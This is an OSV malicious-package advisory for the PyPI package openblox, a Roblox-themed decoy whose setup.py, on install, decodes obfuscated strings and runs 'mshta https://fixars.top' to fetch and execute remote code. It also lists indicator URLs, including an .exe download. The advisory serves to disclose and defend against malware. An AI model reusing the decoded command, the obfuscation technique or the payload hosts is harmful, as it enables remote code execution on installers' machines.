{"id":"MAL-2026-6504","summary":"Malicious code in openblox (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (cdd874a78973f84b5373fc03a48472c338ca82ef0a258b7614f81a8359da1201)\nsetup.py invokes GetGitCommitHash() unconditionally at module top level, so it runs on `pip install openblox` (and any setuptools invocation). On Windows the function builds its command via two helpers (GetDefaultSystemPolicy, CalculateNodeDrift) that reconstruct strings from integer arrays using chr(byte + 14); the arrays decode to `mshta` and `https://fixars.top`. The resulting command is passed to subprocess.check_output with shell=True, causing Windows installers to launch `mshta https://fixars.top` — the mshta.exe Living-Off-The-Land binary downloads and executes remote HTA/JScript, giving the operator arbitrary code execution on the installer's machine. The obfuscation (chr-arithmetic with helper functions falsely named for hardware/latency diagnostics) exists solely to hide the URL and binary name from static scanners. The package additionally exhibits a cover-story shape: it is published under the name `openblox` with a Roblox-themed description, but the actual code is an unrelated `sqligen` SQLite utility, with placeholder author metadata (John / john@example.com / github.com/john/sqligen). The Roblox-library name appears chosen to attract installs intended for the legitimate openblox API library.\n\n## Source: kam193 (a8567ce5afa387ad85e22cb7c9144f18e816ae0912f109d7a8afec0dbc1d2b6d)\nDuring installation, the code attempts to download and start a malicious executable.\n\nLikely related to 2025-08-raknet-testing-package.\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-06-easyaillm\n\n\nReasons (based on the campaign):\n\n\n - Downloads and executes a remote executable.\n\n\n - obfuscation\n\n\n - malware\n\n\n - tool:mshta\n","modified":"2026-06-26T12:26:02.407477600Z","published":"2026-06-26T04:51:49Z","database_specific":{"iocs":{"domains":["fixars.top"],"urls":["https://pastebin.com/raw/hEF5HaFc","https://pastebin.com/raw/yBcUM1QBs","https://pastebin.com/raw/yBcUM1QB","http://fixars.top","https://tmpfiles.org/dl/wawHVGgfydD7/6a306c5f03a52.exe","http://62.60.226.243/public_files/98r4aXA.txt","http://62.60.226.243/public_files/16sas.jpg?12711313"]},"malicious-packages-origins":[{"id":"IN-MAL-2026-007591","import_time":"2026-06-26T04:57:29.014306027Z","versions":["1.0.1"],"sha256":"20f2506c62a484f986c8e40a2b7e977adb84415ede954d8c3488aa9d727bb25f","source":"amazon-inspector","modified_time":"2026-06-26T04:51:52Z"},{"id":"IN-MAL-2026-007590","versions":["1.0.0"],"source":"amazon-inspector","sha256":"cdd874a78973f84b5373fc03a48472c338ca82ef0a258b7614f81a8359da1201","import_time":"2026-06-26T04:57:28.985678428Z","modified_time":"2026-06-26T04:51:49Z"},{"id":"pypi/2026-06-easyaillm/openblox","modified_time":"2026-06-26T09:19:57.58757Z","import_time":"2026-06-26T10:34:51.115208299Z","sha256":"a8567ce5afa387ad85e22cb7c9144f18e816ae0912f109d7a8afec0dbc1d2b6d","source":"kam193","versions":["1.0.0","1.0.1"]}]},"references":[{"type":"PACKAGE","url":"https://pypi.org/project/openblox/1.0.1/"},{"type":"PACKAGE","url":"https://pypi.org/project/openblox/1.0.0/"},{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/1a5beab4a6facb46b4afc5f8526e1327e6c7d740ccaf34c6a921ac18eff29427/detection"},{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/4c99c8edfc4444f46932f14afccb2952a3850df765765f9ac793d69f318c192f/detection"},{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/0649f50ead3695f41c1243883200bdb775410bcd8c8fb88277740a625a154e25"},{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/926e8f1a7f349ff1eef31f89fa8ffe265c30b92e310e8bea19962d38f8c32129"},{"type":"WEB","url":"https://bad-packages.kam193.eu/pypi/package/openblox"}],"affected":[{"package":{"name":"openblox","ecosystem":"PyPI","purl":"pkg:pypi/openblox"},"versions":["1.0.1","1.0.0"],"database_specific":{"indicators":{"evidence_files":[{"path":"setup.py","tlsh":"9642d796ea560a75e7c742f0890747c67b7afa2b16010874bcdec1081f4a6b983772ed","sha256":"5373dd42ec3c14a56bcd46e8b7f076a1f44a1db64cde899550525d9fea186550"}],"package_integrity":[{"filename":"openblox-1.0.1.tar.gz","hashes":{"md5":"bfb0e7c1db674fbdbab5d397c45e563a","sha256":"992ac4caa31827527eb2f98191b37a3b97cafb272f1a0ca232aedb715c807123","blake2b_256":"74dd05f08a8bcf39fd46327acb3ed7fcf340f5d541c92eb3e6e8aee704959782"}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/openblox/MAL-2026-6504.json","cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"],"type":"REPORTER"}]}